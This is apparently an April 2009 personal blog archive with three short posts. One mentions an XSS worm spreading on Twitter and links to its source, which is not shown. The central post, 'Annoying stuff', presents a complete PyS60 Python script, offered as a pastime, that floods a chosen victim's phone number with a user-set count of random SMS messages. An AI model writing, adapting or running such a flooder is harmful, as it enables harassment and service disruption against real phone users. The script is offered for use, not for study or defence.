Archive for April, 2009

Yet an other XSS worm

Monday, April 13th, 2009

It seems that a XSS worm is spreading among twitter users … here more details.
You can find the src code of the worm here.

Annoying stuff

Saturday, April 11th, 2009

How to spend your time during a long travel:

# flood a victim telephone with random generated sms (for pys60)
import messaging
import appuifw
import random

def rnd():
return random.randint(97,97+26)

num=appuifw.query(u"telephone number?","text")
cnt=appuifw.query(u"how many?","number")

while abs(cnt)>0:
testo=chr(rnd())+chr(rnd())+chr(rnd())+chr(rnd())+chr(rnd())
messaging.sms_send(num,testo)
cnt=cnt-1
print "sent: "+testo

Sunday, April 5th, 2009

I am still alive …